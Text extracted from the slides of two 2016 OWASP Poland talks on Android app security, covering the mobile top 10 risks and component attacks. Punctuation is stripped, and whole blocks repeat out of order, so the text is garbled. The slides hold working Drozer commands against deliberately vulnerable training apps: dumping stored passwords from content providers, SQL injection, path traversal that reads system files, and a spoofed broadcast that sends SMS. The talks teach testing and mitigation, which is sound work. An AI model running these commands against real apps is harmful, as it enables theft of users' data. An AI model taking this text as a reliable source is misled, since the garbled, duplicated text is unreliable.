bull httpresourcesinfosecinstitutecomandroid-hacking-security-part-2-content-provider-leakagebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-3-exploiting-broadcast-receiversbull httpyinzhicaoorgcoursesf15cse343443slidesmobilesecuritypdfbull httpswwwsafaribooksonlinecomlibraryviewandroid-security-cookbookbull httpswwwmwrinfosecuritycomsystemassets937originalmwri_drozer-user-guide_2015-03-23pdfbull httpsmanifestsecuritycomandroid-application-security-part-5bull httpsmanifestsecuritycomandroid-application-security-part-8bull httpswwweecsberkeleyedu~dawpapersintents-mobisys11pdfbull httpblogsegueseccom201209path-traversal-vulnerability-on-shazam-android-applicationbull httpsgithubcomtanprathanMobileApp-Pentest-Cheatsheetandroid-application-penetration-testing
Thank you
bull For additional questions or just to stay in touch c0rdis
OWASP top 10 mobile risks
Pawel RzepaOWASP Poland24022016
Important notes
bull The goal of this presentation is to provide you a basic knowledge about mobile risks and easy methodology to find those risks in your applications
bull If you want to add anything importantinteresting and related to the topic ndash feel free to interrupt me )
What are we going to talk abouthellip
Before we starthellip the threat model
M2 - Insecure data storage
Insecure data storage ndash what it is
bull Simple words definition valuable pieces of data (eg passwords cookies personal information) are stored in the data-stores on the device in insecure (plain text or reversable encoding) format
Insecure data storage ndash what to look for
bull Look for any sensitive information inndash SQLite databases (local)ndash XML Data Storesndash Plain text configuration filesndash Cookie storesndash SD Card
Insecure data storage ndash how to find
bull Install and run application for some timebull Monitor changes in sdcard before and after
installing an applicationbull Analyze package files on different stages
adb pull datadataltapk_package_namegt
Insecure data storage - demo
Insecure data storage ndash real example
bull Outlook stored all attachements as unencrypted and world readable files on external storage
Insecure data storage - mitigations
bull Donrsquot store data unless itrsquos absolutely necessarry
bull Use encryption for local storage (use method setStorageEncryption)
bull For databases consider using SQLcipher for Sqlite data encryption
bull Ensure any shared preferences properties are NOT MODE_WORLD_READABLE
M3 - Insufficient transport layer protection
Insufficient transport layer protection ndash what it is
bull Simple words definition application does NOT implement TLS or it does incorrectly
What do you mean bdquoincorrectlyrdquo
bull Insecure implementations arendash Using known weak ciphers version (eg
SSLv2SSLv3 RC4)ndash Securing only part of the communication (eg only
authentication)ndash Lack of certificate inspection
Certificate inspection in web applications ndash chain of trustbull In web applications the validation of certificate is on the
side of a browserbull It is done by a bdquochain of trustrdquo
bull But how a mobile app can know if it is communicating with a proper server
Cert Pinning - theory
bull Embedded in source code expected X509 certificate or public key
if (presented_cert == pinned_cert)Start_connection()elseDrop_connection()
Cert Pinning - reality
bull Guys from Leibniz Universitaumlt Hannover tested 100 apps andhellip
bull 21 apps trust all certificatesbull 20 apps accept all hostnamesbull And in the end they asked developers why it
happenedhellip
More httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdf
Insufficient transport layer protection- how to find
bull Passive analysis with WiresharkBurp (to check if all traffic is encrypted)
bull Use Mallodroidmallodroidpy ndashf AppToCheckapk ndashd javaout
bull Look for end point implementation flaws using SSLyze (or httpswwwssllabscomssltest for public domain)
sslyze --regular wwwexamplecom443
Insufficient transport layer protection- example
Insufficient transport layer protection-few facts from reality
bull According to the FireEye research from July 17 2014 among 1000 most-downloaded free applications in the Google Play store
Source httpswwwfireeyecomblogthreat-research201408ssl-vulnerabilities-who-listens-when-android-applications-talkhtml
Insufficient transport layer protection- mitigationsbull Any sensitive data MUST be transfered over TLSbull How to do it properly Follow the rules https
wwwowasporgindexphpTransport_Layer_Protection_Cheat_Sheet
M4 - Unintended data leakage
Unintended data leakage ndash what it is
bull Simple word definition OSframeworks puts sensitive information in an insecure location in the device
bull Important note insecure data storage talks about developer conscious efforts to store data in insecure manner while unintended data leakage refers to OSframework specific quirks which can cause data leakages
Unintended data leakage ndash common leakage points
bull URL Caching bull CopyPaste buffer Cachingbull Loggingbull Analytics data sent to 3rd parties (eg ads
sending GPS location)
Unintended data leakage ndash how to find
bull Extract data from leaking content providers using Drozer
dzgt run appproviderfinduri ltpackage_namegt
bull Use logcat to verify what is being logged using ADBadb logcat [output filter]
bull Use listener (BurpWireshark) to monitor what is being sent to 3rd parties
bull Use Intent Sniffer to see if any confidential data is sent via Intents
Unintended data leakage - demo
Unintended data leakage - mitigations
bull NEVER log any sensitive information (observe what yoursquore storing in crashlogs)
bull Disable copypaste function for sensitive part of the application
bull Disable debugging (androiddebuggable=false)
M5 - Poor Authorization and Authentication
Poor Authorization and Authentication ndash what is it
bull Simple words definition if yoursquore able to bypass authentication andor laverage your privileges thenhellip your app has poor authorization andor authentication
Poor Authorization and Authentication ndash how to find
bull Try to bypass authentication by accessing exported activities using Drozer
dzgt run appactivitystart ndashcomponent ltcomponent_namegt
bull Intercept traffic with Burp and modify parameter to login as other usersee unauthorized content (eg by manipulating device ID)
bull Test account lockout policybull Test strong password policy
Poor Authorization and Authentication - demo
Poor Authorization and Authentication ndash real example
bull A flaw in application can become an entry point to compromise an operating system
bull For example a Viber apphttpswwwyoutubecomwatchtime_continue=40ampv=rScheIQDD0k
And always remember tohellip
bull hellipstay reasonable when yoursquore going to follow advices from the Internethellip
Poor Authorization and Authentication - mitigations
bull Assume that client-side authorization and authentication controls can be bypassed - they must be re-enforced on the server-side whenever possible
bull Persistent authentication (Remember Me) functionality implemented within mobile applications should never store a userrsquos password on the device It should be optional and not be enabled by default
M6 - Broken Cryptography
Broken Cryptography ndash what it is
bull Simple words definition using insecure implementation or implementing it in a insecure way
bull Few reminders (yeah I know you know ithellip)ndash encoding = encryptionndash obfuscation = encryption
Broken Cryptography ndash how to find
bull Decompile the apk using dex2jar (or luyten for more verbose result) and review jar file in JD-GUI
bull Look for decryption keys (in attacker-readable folder or hardcoded within binary)
bull Try to break encryption algorithm if an application uses custom encryption
bull Look for usage of insecure andor deprecated algorithms (eg RC4 MD45 SHA1 etc)
Broken Cryptography - example
bull Encrypted db is definitely a good ideahellip
Broken Cryptography - example
bull hellipbut not when yoursquore hardcoding passwords to decrypt it in codehellip
Broken Cryptography ndash real example
bull NQ Vault
Broken Cryptography - mitigations
bull Use known strong cryptography implementations
bull Do not hardcode keyscredentialsOAUTH tokens
bull Do not store keys on a device Use password based encryption instead
M7 - Client side injection
Client side injection ndash what it is
bull Simple words definition malicious code can be provided as an input and executed by the application (on the client side)
bull The malicious code can come fromndash Other application via intentcontent providerndash Shared filendash Server responsendash Third party website
Client side injection ndash what to inject
bull SQL injection to local dbbull XSSWebView injectionbull Directory traversal
bull Intent injection
A new Androidrsquos toy ndash the Intentsbull Android application can talk
(Inter-Process-Communication) to any other component (eg other application system service running new activity etc) via special objects called Intents
Intent i = new Intent(IntentACTION_VIEWUriparse(bdquohttpsowasporgrdquo))Intent i = new Intent(androidproviderMediaStoreAction_IMAGE_CAPTURE)
Client side injection ndash how to find
bull SQL injectionsdzgt run scannerproviderinjection ndasha ltpackage_namegt
bull Data path traversaldzgt run scannerprovidertraversal ndasha ltpackage_namegt
bull Intent injectionsdzgt run apppackagemanifest ndasha ltpackage_namegtdzgt run appactivityinfo ndasha ltpackage_namegt
dzgt run appserviceinfo --permission null ndasha ltpackage_namegtdzgt run intentsfuzzinozer --package_name ltpackage_namegt --
fuzzing_intent
Client side injection ndash real examplebull The UniversalMDMClient (built-in application Samsung KNOX
ndash a security feature to seperate personal and professional activities)
bull Crafted URI with bdquosmdmrdquo prefix allows for remote installation of ANY application while a user thinks hersquos installing an update for UniversalMDMClient
bull How it works in practice httpswwwyoutubecomwatchtime_continue=56ampv=6O9OBmsv-CM
Client side injection - mitigations
bull Always validate on a server side any user inputbull For internal communication use only explicit
Intentsbull Avoid using Intent-filter Even if the Activity has
atribute bdquoexported=falserdquo another application can define the same filter and a system displays a dialog so the user can pick which app to use
M9 - Improper session handling
Improper session handling ndash what it is
bull Simple words definition if your session token can be guessed retrieved by third party or never expires then you have a problem
Improper session handling ndash how to find
bull Intercept requests with proxy (eg Burp) and verify ifndash Verify if a session expires (copy a cookie and try to use it
after 30 minutes)ndash Verify if a session is destroyed after authentication state
changes (eg switching from any logged in user to another logged in user)
ndash Verify if you are able to guess any other session (eg itrsquos easy to impersonate other user when application uses device ID as a session token)
Improper session handling ndash few facts from reality
bull What we know is that bdquosessions have to expirerdquohellip
bull hellipbut how long should it REALLY lastbull According to experiment the average application
session (counted from opening an app to closing it) lastshellip 7156 seconds
- httpwwwmendeleycomresearchfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage
Improper session handling - mitigations
bull Invalidate session on a server sidebull Set session expiration time adjusted to your
applicationbull Destroy all unused session tokensbull Use only high entropy tested token
generation resources
Thank you
pawelrzepaoutlookcom
Referencesbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risksbull httpsgithubcomikusthello-pinnedcertsbull httpwwwexploresecuritycomtesting-for-cipher-suite-preferencebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-4-exploiting-unintended-data-leakage-side-channel-data-leakagebull httpwwwslidesharenetJackManninoowasp-top-10-mobile-risksbull httpsmanifestsecuritycomandroid-application-securitybull httpsmobilesecuritywikicombull httpandroidcrackingblogspotde201402zerdeis-luyten-worthwhile-jd-guihtmlbull httpswwwacsacorg2011openconfmodulesrequestphpmodule=oc_programampaction=viewphpampa=amp
id=111amptype=3ampOPENCONF=54jm3hh7laelc19qq6ernql5m2bull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Mobile_Threat_Modelbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Security_Testingbull httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdfbull httpswwwssllabscomssltestbull httpwwwslidesharenetibmsecurityovertaking-firefox-profiles-vulnerabilities-in-firefox-for-androidbull httpresourcesinfosecinstitutecomcracking-nq-vault-step-by-stepbull httpwwwslidesharenetibmsecuritypinpointing-vulnerabilities-in-android-applications-like-finding-a-needle-in-a-haystackbull httpsgithubcomlinkedinqarkbull httpswwwmendeleycomcatalogfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usagebull httpblogquarkslabcomabusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerabilityhtmlbull httpwwwbkavcomtop-news-view_contentcontent46264critical-flaw-in-viber-allows-full-access-to-android-smartphones-bypassing-lock-screenbull httpthehackernewscom201405microsoft-outlook-app-for-androidhtmlbull httpsdrivegooglecomfiled0BxOPagp1jPHWVnlzWGNVbFBMTW8viewpref=2amppli=1
Reverse Engineering amp Malware Analysis
Daniel RamirezOWASP Poland24022016
Anatomy of an apk
Getting our apk file
bull From the phonendash APKOpticndash Astro File Manager
bull Using ADBbull Use APKpure
Decompiling || Disassembling
bull Decompilingndash High Level ndash Java Code
bull Disassemblingndash Low Level ndash Assembly Code
bull Why Disassembling and not Decompiling
Decompiling
DEX JAR JAVA
JAR DEXJAVA
Decompiling-Dex2Jar
bull dex2jarndash Converts Dalvik bytecode (DEX) to java bytecode
(JAR) ndash Allows to use any existing Java decompiler with
the resulting JAR file
Decompiling ndash Java Decompilers
bull JD-GUI || Luytenndash Closed source Java decompilerndash Combined with dex2jar you can use JD-GUI or
Luyten to decompile Android applications
bull Both are Java decompilers but have different OUTPUT
JD-GUI
Luyten
Disassembling
DEX SMALI
Disassembling
bull Apktoolndash Open source Java tool for reverse-engineering
Android appndash Transform binary Dalvik byte code(dex) into Smali
source
Signing apk
bull Using signapkjarjava -jar signapkjar certificatepem keypk8 your-appapk your-app-signedapk
bull Using AppUse
Demo Time
Demo Decompiling Luyten
Demo Modify Smali Files
Demo
Activity components attacks
bull If an activity can be triggered by other apps (by an attacker) it can be abused
bull Launching by intents itrsquos possible to achieve the followingndash Modify data in backgroundndash Tricking the userndash Leaking sensitive information
Activities
Activity components attacksbull General hijacking scheme
bull Results of an attackndash Malicious Activity could read the data in the Intent and then
immediately relay it to a legitimate onendash Spoofing the expected Activityrsquos user interface to steal user-supplied
data (phishing)
A B
E
Activities
Activity components attacks Activities
bull List and launch exported activities
dzgt run appactivityinfo -a commwrexamplesieve Package commwrexamplesieve commwrexamplesieveFileSelectActivity commwrexamplesieveMainLoginActivity commwrexamplesievePWList
dzgt run appactivitystart --component commwrexamplesieve commwrexamplesievePWList
Activity components demo Activities
Services
A Service can perform long-running operations in the background and does not provide a user interface Other components can bind to a Service which lets the binder invoke methods that are declared in the target Servicersquos interface Intents are used to start and bind to Services
Example playing music or downloading a file
Services
Services attacks
Although generally donrsquot seem dangerous they could potentially perform sensitive operations
To attack a service one need interaction (it must be exported or respondaccept input from message formats like intents files or the network stack)
Services
Services attacks
Typical attacks Denial of Service and Information Leakage
bull Find exported servicesbull Launch them one-by-one with logcat to check
for sensitive infobull Fire off intents and wait for it
Services
Content providers
A content provider presents data to external applications as one or more tables In other words content providers can be treated as interfaces that connect data in one process with code running in another process
Example using content providers any app can read SMS from inbuilt SMS apprsquos repository in our device
Content providers
Content providers
bull What info can they holdndash Userrsquos phone numbersndash Passwordsndash SMS
bull And one of the main problems are again permissions
run appproviderinfo --permission null
Content providers
Content providers attacks
bull Unrestricted access to app databasendash Just query it ndash run appproviderquery contentsettingssecure
bull SQL injectionbull Path traversal
Other attack vectors on auth might include altering data eg by using appproviderinsert command
Content providers
dzgt run scannerproviderinjection -a commwrexamplesieve
Content providers attacks
bull Unrestricted access to app database
Content providers
dzgt run scannerproviderfinduris -a commwrexamplesieve Accessible content URIs contentcommwrexamplesieveDBContentProviderKeys contentcommwrexamplesieveDBContentProviderPasswordscontentcommwrexamplesieveDBContentProviderPasswords
dzgt run appproviderquery contentcommwrexamplesieveDBContentProviderPasswords --vertical
Content providers attacks
bull SQL injection
Content providers
dzgt run appproviderquery contentcommwrexamplesieveDBContentProviderPasswords --selection unrecognized token ) (code 1) while compiling SELECT FROM Passwords WHERE ()
dzgt run appproviderquery contentcommwrexamplesieveDBContentProviderPasswords --projection FROM Key--| Password | pin || thisismypassword | 9876 |
Content providers attacks
bull Path traversal
Content providers
One interesting real-life example httpblogsegueseccom201209path-traversal-vulnerability-on-shazam-android-application
dzgt run appproviderread contentcommwrexamplesieveFileBackupProvideretchosts127001 localhost
dzgt run appproviderdownload contentcommwrexamplesieveFileBackupProviderdatadatacommwrexamplesie vedatabasesdatabasedb homeuserdatabasedbWritten 24576 bytes
Content providers demo Content providers
Broadcast receivers
A broadcast receiver is a component that responds to system-wide broadcast announcements such as Battery Low boot completed headset plug etc Though most of the broadcast receivers are originated by the system applications can also announce broadcasts
Broadcast receivers
Broadcast receivers
bull If receiver accepts broadcasts from untrusted sources app is at risk
Broadcast receivers
Broadcast receivers attacks
Typical fail authorization
bull Enumerate receiversbull Determine how the receiver handles the
actionbull Send intent and enjoy
Broadcast receivers
Broadcast receivers attacks
ltreceiver androidname=broadcastreceiversSendSMSNowReceiverrdquoandroidlabel=Send SMS gt ltintent-filtergt
ltaction androidname=orgowaspgoatdroidfourgoatsSOCIAL_SMS gt ltintent-filtergtltreceivergthellipltuses-permission androidname=androidpermissionSEND_SMS gt
Sample manifest from GoatDroid
Broadcast receivers
Broadcast receivers attacks
public void onReceive(Context arg0 Intent arg1) context = arg0 SmsManager sms = SmsManagergetDefault() Bundle bundle = arg1getExtras() smssendTextMessage(bundlegetString(phoneNumber) null bundlegetString(message) null null) UtilsmakeToast(context ConstantsTEXT_MESSAGE_SENT ToastLENGTH_LONG)
The following is the code that determines how the receiver handles the orgowaspgoatdroidfourgoatsSOCIAL_SMS actions
Broadcast receivers
Broadcast receivers attacks
run appbroadcastsend --action orgowaspgoatdroidfourgoatsSOCIAL_SMS --component orgowaspgoatdroidfourgoats orgowaspgoatdroidfourgoatsbroadcastreceiversSendSMSNowReceiver --extra string phoneNumber 1234567890 --extra string message PWNED
Broadcast receivers
General defenses for App Components
Applies for all abovementioned itemsbull Setting androidexported attribute to false
(only this user ID as the current app will be able to access the activity)
bull Limiting access with custom permissions for an activity (RECEIVE_SMS and others)
Referencesbull httpdeveloperandroidcomguidecomponentsindexhtmlbull httpdeveloperandroidcomguidetopicsmanifestmanifest-introhtmlbull http
resourcesinfosecinstitutecomandroid-hacking-security-part-1-exploiting-securing-application-components
bull httpresourcesinfosecinstitutecomandroid-hacking-security-part-2-content-provider-leakagebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-3-exploiting-broadcast-receiversbull httpyinzhicaoorgcoursesf15cse343443slidesmobilesecuritypdfbull httpswwwsafaribooksonlinecomlibraryviewandroid-security-cookbookbull httpswwwmwrinfosecuritycomsystemassets937originalmwri_drozer-user-guide_2015-03-23pdfbull httpsmanifestsecuritycomandroid-application-security-part-5bull httpsmanifestsecuritycomandroid-application-security-part-8bull httpswwweecsberkeleyedu~dawpapersintents-mobisys11pdfbull httpblogsegueseccom201209path-traversal-vulnerability-on-shazam-android-applicationbull httpsgithubcomtanprathanMobileApp-Pentest-Cheatsheetandroid-application-penetration-testing
Thank you
bull For additional questions or just to stay in touch c0rdis
OWASP top 10 mobile risks
Pawel RzepaOWASP Poland24022016
Important notes
bull The goal of this presentation is to provide you a basic knowledge about mobile risks and easy methodology to find those risks in your applications
bull If you want to add anything importantinteresting and related to the topic ndash feel free to interrupt me )
What are we going to talk abouthellip
Before we starthellip the threat model
M2 - Insecure data storage
Insecure data storage ndash what it is
bull Simple words definition valuable pieces of data (eg passwords cookies personal information) are stored in the data-stores on the device in insecure (plain text or reversable encoding) format
Insecure data storage ndash what to look for
bull Look for any sensitive information inndash SQLite databases (local)ndash XML Data Storesndash Plain text configuration filesndash Cookie storesndash SD Card
Insecure data storage ndash how to find
bull Install and run application for some timebull Monitor changes in sdcard before and after
installing an applicationbull Analyze package files on different stages
adb pull datadataltapk_package_namegt
Insecure data storage - demo
Insecure data storage ndash real example
bull Outlook stored all attachements as unencrypted and world readable files on external storage
Insecure data storage - mitigations
bull Donrsquot store data unless itrsquos absolutely necessarry
bull Use encryption for local storage (use method setStorageEncryption)
bull For databases consider using SQLcipher for Sqlite data encryption
bull Ensure any shared preferences properties are NOT MODE_WORLD_READABLE
M3 - Insufficient transport layer protection
Insufficient transport layer protection ndash what it is
bull Simple words definition application does NOT implement TLS or it does incorrectly
What do you mean bdquoincorrectlyrdquo
bull Insecure implementations arendash Using known weak ciphers version (eg
SSLv2SSLv3 RC4)ndash Securing only part of the communication (eg only
authentication)ndash Lack of certificate inspection
Certificate inspection in web applications ndash chain of trustbull In web applications the validation of certificate is on the
side of a browserbull It is done by a bdquochain of trustrdquo
bull But how a mobile app can know if it is communicating with a proper server
Cert Pinning - theory
bull Embedded in source code expected X509 certificate or public key
if (presented_cert == pinned_cert)Start_connection()elseDrop_connection()
Cert Pinning - reality
bull Guys from Leibniz Universitaumlt Hannover tested 100 apps andhellip
bull 21 apps trust all certificatesbull 20 apps accept all hostnamesbull And in the end they asked developers why it
happenedhellip
More httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdf
Insufficient transport layer protection- how to find
bull Passive analysis with WiresharkBurp (to check if all traffic is encrypted)
bull Use Mallodroidmallodroidpy ndashf AppToCheckapk ndashd javaout
bull Look for end point implementation flaws using SSLyze (or httpswwwssllabscomssltest for public domain)
sslyze --regular wwwexamplecom443
Insufficient transport layer protection- example
Insufficient transport layer protection-few facts from reality
bull According to the FireEye research from July 17 2014 among 1000 most-downloaded free applications in the Google Play store
Source httpswwwfireeyecomblogthreat-research201408ssl-vulnerabilities-who-listens-when-android-applications-talkhtml
Insufficient transport layer protection- mitigationsbull Any sensitive data MUST be transfered over TLSbull How to do it properly Follow the rules https
wwwowasporgindexphpTransport_Layer_Protection_Cheat_Sheet
M4 - Unintended data leakage
Unintended data leakage ndash what it is
bull Simple word definition OSframeworks puts sensitive information in an insecure location in the device
bull Important note insecure data storage talks about developer conscious efforts to store data in insecure manner while unintended data leakage refers to OSframework specific quirks which can cause data leakages
Unintended data leakage ndash common leakage points
bull URL Caching bull CopyPaste buffer Cachingbull Loggingbull Analytics data sent to 3rd parties (eg ads
sending GPS location)
Unintended data leakage ndash how to find
bull Extract data from leaking content providers using Drozer
dzgt run appproviderfinduri ltpackage_namegt
bull Use logcat to verify what is being logged using ADBadb logcat [output filter]
bull Use listener (BurpWireshark) to monitor what is being sent to 3rd parties
bull Use Intent Sniffer to see if any confidential data is sent via Intents
Unintended data leakage - demo
Unintended data leakage - mitigations
bull NEVER log any sensitive information (observe what yoursquore storing in crashlogs)
bull Disable copypaste function for sensitive part of the application
bull Disable debugging (androiddebuggable=false)
M5 - Poor Authorization and Authentication
Poor Authorization and Authentication ndash what is it
bull Simple words definition if yoursquore able to bypass authentication andor laverage your privileges thenhellip your app has poor authorization andor authentication
Poor Authorization and Authentication ndash how to find
bull Try to bypass authentication by accessing exported activities using Drozer
dzgt run appactivitystart ndashcomponent ltcomponent_namegt
bull Intercept traffic with Burp and modify parameter to login as other usersee unauthorized content (eg by manipulating device ID)
bull Test account lockout policybull Test strong password policy
Poor Authorization and Authentication - demo
Poor Authorization and Authentication ndash real example
bull A flaw in application can become an entry point to compromise an operating system
bull For example a Viber apphttpswwwyoutubecomwatchtime_continue=40ampv=rScheIQDD0k
And always remember tohellip
bull hellipstay reasonable when yoursquore going to follow advices from the Internethellip
Poor Authorization and Authentication - mitigations
bull Assume that client-side authorization and authentication controls can be bypassed - they must be re-enforced on the server-side whenever possible
bull Persistent authentication (Remember Me) functionality implemented within mobile applications should never store a userrsquos password on the device It should be optional and not be enabled by default
M6 - Broken Cryptography
Broken Cryptography ndash what it is
bull Simple words definition using insecure implementation or implementing it in a insecure way
bull Few reminders (yeah I know you know ithellip)ndash encoding = encryptionndash obfuscation = encryption
Broken Cryptography ndash how to find
bull Decompile the apk using dex2jar (or luyten for more verbose result) and review jar file in JD-GUI
bull Look for decryption keys (in attacker-readable folder or hardcoded within binary)
bull Try to break encryption algorithm if an application uses custom encryption
bull Look for usage of insecure andor deprecated algorithms (eg RC4 MD45 SHA1 etc)
Broken Cryptography - example
bull Encrypted db is definitely a good ideahellip
Broken Cryptography - example
bull hellipbut not when yoursquore hardcoding passwords to decrypt it in codehellip
Broken Cryptography ndash real example
bull NQ Vault
Broken Cryptography - mitigations
bull Use known strong cryptography implementations
bull Do not hardcode keyscredentialsOAUTH tokens
bull Do not store keys on a device Use password based encryption instead
M7 - Client side injection
Client side injection ndash what it is
bull Simple words definition malicious code can be provided as an input and executed by the application (on the client side)
bull The malicious code can come fromndash Other application via intentcontent providerndash Shared filendash Server responsendash Third party website
Client side injection ndash what to inject
bull SQL injection to local dbbull XSSWebView injectionbull Directory traversal
bull Intent injection
A new Androidrsquos toy ndash the Intentsbull Android application can talk
(Inter-Process-Communication) to any other component (eg other application system service running new activity etc) via special objects called Intents
Intent i = new Intent(IntentACTION_VIEWUriparse(bdquohttpsowasporgrdquo))Intent i = new Intent(androidproviderMediaStoreAction_IMAGE_CAPTURE)
Client side injection ndash how to find
bull SQL injectionsdzgt run scannerproviderinjection ndasha ltpackage_namegt
bull Data path traversaldzgt run scannerprovidertraversal ndasha ltpackage_namegt
bull Intent injectionsdzgt run apppackagemanifest ndasha ltpackage_namegtdzgt run appactivityinfo ndasha ltpackage_namegt
dzgt run appserviceinfo --permission null ndasha ltpackage_namegtdzgt run intentsfuzzinozer --package_name ltpackage_namegt --
fuzzing_intent
Client side injection ndash real examplebull The UniversalMDMClient (built-in application Samsung KNOX
ndash a security feature to seperate personal and professional activities)
bull Crafted URI with bdquosmdmrdquo prefix allows for remote installation of ANY application while a user thinks hersquos installing an update for UniversalMDMClient
bull How it works in practice httpswwwyoutubecomwatchtime_continue=56ampv=6O9OBmsv-CM
Client side injection - mitigations
bull Always validate on a server side any user inputbull For internal communication use only explicit
Intentsbull Avoid using Intent-filter Even if the Activity has
atribute bdquoexported=falserdquo another application can define the same filter and a system displays a dialog so the user can pick which app to use
M9 - Improper session handling
Improper session handling ndash what it is
bull Simple words definition if your session token can be guessed retrieved by third party or never expires then you have a problem
Improper session handling ndash how to find
bull Intercept requests with proxy (eg Burp) and verify ifndash Verify if a session expires (copy a cookie and try to use it
after 30 minutes)ndash Verify if a session is destroyed after authentication state
changes (eg switching from any logged in user to another logged in user)
ndash Verify if you are able to guess any other session (eg itrsquos easy to impersonate other user when application uses device ID as a session token)
Improper session handling ndash few facts from reality
bull What we know is that bdquosessions have to expirerdquohellip
bull hellipbut how long should it REALLY lastbull According to experiment the average application
session (counted from opening an app to closing it) lastshellip 7156 seconds
- httpwwwmendeleycomresearchfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage
Improper session handling - mitigations
bull Invalidate session on a server sidebull Set session expiration time adjusted to your
applicationbull Destroy all unused session tokensbull Use only high entropy tested token
generation resources
Thank you
pawelrzepaoutlookcom
Referencesbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risksbull httpsgithubcomikusthello-pinnedcertsbull httpwwwexploresecuritycomtesting-for-cipher-suite-preferencebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-4-exploiting-unintended-data-leakage-side-channel-data-leakagebull httpwwwslidesharenetJackManninoowasp-top-10-mobile-risksbull httpsmanifestsecuritycomandroid-application-securitybull httpsmobilesecuritywikicombull httpandroidcrackingblogspotde201402zerdeis-luyten-worthwhile-jd-guihtmlbull httpswwwacsacorg2011openconfmodulesrequestphpmodule=oc_programampaction=viewphpampa=amp
id=111amptype=3ampOPENCONF=54jm3hh7laelc19qq6ernql5m2bull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Mobile_Threat_Modelbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Security_Testingbull httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdfbull httpswwwssllabscomssltestbull httpwwwslidesharenetibmsecurityovertaking-firefox-profiles-vulnerabilities-in-firefox-for-androidbull httpresourcesinfosecinstitutecomcracking-nq-vault-step-by-stepbull httpwwwslidesharenetibmsecuritypinpointing-vulnerabilities-in-android-applications-like-finding-a-needle-in-a-haystackbull httpsgithubcomlinkedinqarkbull httpswwwmendeleycomcatalogfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usagebull httpblogquarkslabcomabusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerabilityhtmlbull httpwwwbkavcomtop-news-view_contentcontent46264critical-flaw-in-viber-allows-full-access-to-android-smartphones-bypassing-lock-screenbull httpthehackernewscom201405microsoft-outlook-app-for-androidhtmlbull httpsdrivegooglecomfiled0BxOPagp1jPHWVnlzWGNVbFBMTW8viewpref=2amppli=1
Reverse Engineering amp Malware Analysis
Daniel RamirezOWASP Poland24022016
Anatomy of an apk
Getting our apk file
bull From the phonendash APKOpticndash Astro File Manager
bull Using ADBbull Use APKpure
Decompiling || Disassembling
bull Decompilingndash High Level ndash Java Code
bull Disassemblingndash Low Level ndash Assembly Code
bull Why Disassembling and not Decompiling
Decompiling
DEX JAR JAVA
JAR DEXJAVA
Decompiling-Dex2Jar
bull dex2jarndash Converts Dalvik bytecode (DEX) to java bytecode
(JAR) ndash Allows to use any existing Java decompiler with
the resulting JAR file
Decompiling ndash Java Decompilers
bull JD-GUI || Luytenndash Closed source Java decompilerndash Combined with dex2jar you can use JD-GUI or
Luyten to decompile Android applications
bull Both are Java decompilers but have different OUTPUT
JD-GUI
Luyten
Disassembling
DEX SMALI
Disassembling
bull Apktoolndash Open source Java tool for reverse-engineering
Android appndash Transform binary Dalvik byte code(dex) into Smali
source
Signing apk
bull Using signapkjarjava -jar signapkjar certificatepem keypk8 your-appapk your-app-signedapk
bull Using AppUse
Demo Time
Demo Decompiling Luyten
Demo Modify Smali Files
Demo
Activity components attacksbull General hijacking scheme
bull Results of an attackndash Malicious Activity could read the data in the Intent and then
immediately relay it to a legitimate onendash Spoofing the expected Activityrsquos user interface to steal user-supplied
data (phishing)
A B
E
Activities
Activity components attacks Activities
bull List and launch exported activities
dzgt run appactivityinfo -a commwrexamplesieve Package commwrexamplesieve commwrexamplesieveFileSelectActivity commwrexamplesieveMainLoginActivity commwrexamplesievePWList
dzgt run appactivitystart --component commwrexamplesieve commwrexamplesievePWList
Activity components demo Activities
Services
A Service can perform long-running operations in the background and does not provide a user interface Other components can bind to a Service which lets the binder invoke methods that are declared in the target Servicersquos interface Intents are used to start and bind to Services
Example playing music or downloading a file
Services
Services attacks
Although generally donrsquot seem dangerous they could potentially perform sensitive operations
To attack a service one need interaction (it must be exported or respondaccept input from message formats like intents files or the network stack)
Services
Services attacks
Typical attacks Denial of Service and Information Leakage
bull Find exported servicesbull Launch them one-by-one with logcat to check
for sensitive infobull Fire off intents and wait for it
Services
Content providers
A content provider presents data to external applications as one or more tables In other words content providers can be treated as interfaces that connect data in one process with code running in another process
Example using content providers any app can read SMS from inbuilt SMS apprsquos repository in our device
Content providers
Content providers
bull What info can they holdndash Userrsquos phone numbersndash Passwordsndash SMS
bull And one of the main problems are again permissions
run appproviderinfo --permission null
Content providers
Content providers attacks
bull Unrestricted access to app databasendash Just query it ndash run appproviderquery contentsettingssecure
bull SQL injectionbull Path traversal
Other attack vectors on auth might include altering data eg by using appproviderinsert command
Content providers
dzgt run scannerproviderinjection -a commwrexamplesieve
Content providers attacks
bull Unrestricted access to app database
Content providers
dzgt run scannerproviderfinduris -a commwrexamplesieve Accessible content URIs contentcommwrexamplesieveDBContentProviderKeys contentcommwrexamplesieveDBContentProviderPasswordscontentcommwrexamplesieveDBContentProviderPasswords
dzgt run appproviderquery contentcommwrexamplesieveDBContentProviderPasswords --vertical
